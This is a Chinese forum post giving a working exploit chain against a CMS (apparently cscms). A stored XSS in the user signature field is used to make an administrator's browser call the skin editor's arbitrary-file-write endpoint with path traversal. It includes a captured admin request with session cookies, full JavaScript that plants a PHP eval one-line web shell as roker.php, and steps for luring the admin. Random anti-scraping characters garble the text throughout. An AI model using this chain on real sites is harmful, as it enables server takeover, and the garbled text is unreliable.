|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题4 ?' a; j5 l* ?* N# H# U
官网已经修补了,所以重新下了源码0 K3 W. J. ?1 G8 J+ C
因为 后台登入 还需要认证码 所以 注入就没看了。' J, {) S- O6 p; a6 x0 a
存在 xss/ F7 D9 P b& G2 m. t [! d- b
漏洞文件 user/member/skin_edit.php
! a* P) N; g+ P" n4 P7 \7 M本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:# W* @& ~4 U f+ F! N% F3 h
F" b! @* D# ^4 u! U6 F- T0 Z</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
$ m' k1 Z% h2 j+ H4 A$ C
1 Z2 j8 B! ^: T</textarea></td></tr>
4 K! k% b0 G4 U3 n1 ?# M
/ S8 F! k5 v2 N! s, t6 ? user/do.php $ @0 l* \! @$ [
9 a! Z: o% }' O
4 v/ [! s5 R3 }% q" ~* \
if($op=='zl'){ //资料
l' r/ f0 J2 j" G0 T0 s! D; a5 i - o* B2 d' a4 J1 ^5 ]
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 9 D: o1 m5 L, @5 T# f3 c
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); n7 p, ^4 L- r' c0 H P
6 F7 K7 z5 Z4 y( v $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',$ \& w7 q9 H! u' T5 ?3 P
$ W! P9 h5 W" p4 P: F CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
# j5 w5 v* @' u! _, U& I where CS_Name='".$cscms_name."'";
1 r( |3 x, M! S9 z9 B ( `$ A8 H% C/ Y% ^
if($db->query($sql)){5 m/ N$ y# v+ n1 {7 A0 y2 H s
( M3 I5 j+ i$ Y1 k3 A+ A4 r" | exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
3 s6 `' F8 K+ O/ v( e
( }+ T6 H3 L8 u \ }else{' I+ ]( b; X) b% [( l# t
: v( D. Y2 U$ ~: g: e; ?5 j
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));. H7 i2 U6 K6 j. g; ~
% S0 q/ H4 v/ a. p \& o5 I
}" r q6 g5 x! a3 `) E5 W# v; [5 E
( W* V% x- m& T# Y& T3 W
* c3 f! e* \3 v# a5 {- {
没有 过滤导致xss产生。 t4 G! @. V0 C9 l* j. ~& v8 P
后台 看了下 很奇葩的是可以写任意格式文件。。
; k! e& g% w7 _1 d) v抓包。。
+ \! Y# i' I8 U* e U1 v5 f' {, J* f# x6 C5 \0 P+ v: C
* H' T* h! e) ~本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1+ c7 m$ P; |$ e0 ]" n
& j, {9 w) }* S2 r7 I6 z a
Accept: text/html, application/xhtml+xml, */*' f* `1 j1 k# C& H) q; X- \& i
2 l' \6 @! v. U6 ], I3 x# h- qReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* i2 P2 X' s3 f9 `* e# f / I# U( I* v" t2 B `
Accept-Language: zh-CN0 R: T4 g3 ?7 S" L
0 b1 @- B" I, h) j7 L( hUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)1 W# B. _& t0 @6 ?9 @8 [( D2 _
9 N* I7 \/ r9 V" A: B
Content-Type: application/x-www-form-urlencoded
2 J: Q- R" x3 N5 N: H% ?5 U
2 v) \: ]4 V- h, @; sAccept-Encoding: gzip, deflate
! c6 ], R1 h) Z6 p# H+ G2 i % T( _# S5 t1 ?: s& M
Host: 127.0.0.13 R) T2 m* S1 ~- j
( P4 Q: U$ ^8 G8 B% m5 H U; q2 BContent-Length: 381 O' }: `) u+ l
2 f- F+ @. s! o2 u5 ^4 Z9 H5 i; |
DNT: 12 E! T9 f* L; x: z" r2 B
7 V9 s' e7 V9 P1 S0 b$ c. l
Connection: Keep-Alive+ m& [' K+ g" i+ ]" N
& ~. v J8 \+ H0 T0 J7 z) ]Cache-Control: no-cache% U% K# ?$ ?" C8 Z( x- u. ^# h
! C$ G2 F! N7 w
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
' q' i1 o1 G+ y3 X' l- g5 ~
, n! _# m3 b, ~2 U- C* m6 V8 n+ t8 w. i0 }3 F/ C
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
" q' Q, q6 S( x S6 m1 Y+ h$ a2 z# }/ o; }( a1 l2 W6 ~3 j" o
+ K0 i; s. P: G5 t5 T% g4 m1 P
! U/ _% o2 P. y于是 构造js如下。
6 d* x3 d+ z' {
5 L4 b0 V: `5 ~: W本帖隐藏的内容<script>
& w& ^6 e# K' V s' IthisTHost = top.location.hostname;2 U) ~- L3 E; l1 ^$ }1 _' y
: L* U; S; m& [: a( O5 w1 ?9 gthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
1 B- d l4 {1 M( K3 W/ m$ b* e
+ f" i/ |$ f$ v; y4 c. Zfunction PostSubmit(url, data, msg) { T5 a2 [3 c* E! i" X$ c7 _
var postUrl = url;
0 ]! ^. g' Q+ \- g, ? & b% H' O4 P* h5 |# z" |
var postData = data;
7 z2 N7 U! e9 G. J: `) D2 S, G var msgData = msg; 4 o2 Q# j" }7 W+ u( ^8 G6 }
var ExportForm = document.createElement("FORM");
! W% T- _6 o( u' C& E, d document.body.appendChild(ExportForm);
& z. [3 f1 v. n( u( {3 H6 j ExportForm.method = "POST";
2 [; \' f# p. Z0 ? var newElement = document.createElement("input"); . _& W h6 M. D5 W: M
newElement.setAttribute("name", "name");
; _ T# u! P! V- c. z; n: e" K6 E( ? newElement.setAttribute("type", "hidden");
8 ^7 T6 D% ?$ K& D5 R var newElement2 = document.createElement("input");
1 v$ |0 c2 R% v) h: x$ T newElement2.setAttribute("name", "content"); $ b, @& v3 ?& Y6 J [
newElement2.setAttribute("type", "hidden"); ~- Y/ H2 V, B; R
ExportForm.appendChild(newElement); 1 ?+ G C7 @! ~
ExportForm.appendChild(newElement2);
& p! j# X6 ^, \6 r newElement.value = postData;
& S! o1 j$ V/ ]& G newElement2.value = msgData; . {9 c& |* k" @- }( C
ExportForm.action = postUrl; # c8 X8 A l3 Q4 G% Z" g x5 z
ExportForm.submit(); L5 y' x; A2 t9 Z% E# J
};3 M+ r; E5 [& l% J( o# m
. t8 v, [6 _7 z6 z7 E4 J. \
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");0 R" e0 j i0 C4 d" u: A( \! z6 R3 e
( j" M% e2 Z/ V! G9 ?/ ?1 c1 R' x</script>9 _0 ^! N% h+ D' p- B
. E$ N3 j' N# e) d4 ]# R: ?: t$ _
9 @+ @0 S6 R @/ I5 I7 t3 A) zhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
, q; U, Q" n* N$ q9 E% c用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
4 Z$ d `% \4 H o/ i7 ~# |! `就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
" U/ v0 Q; f' i |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对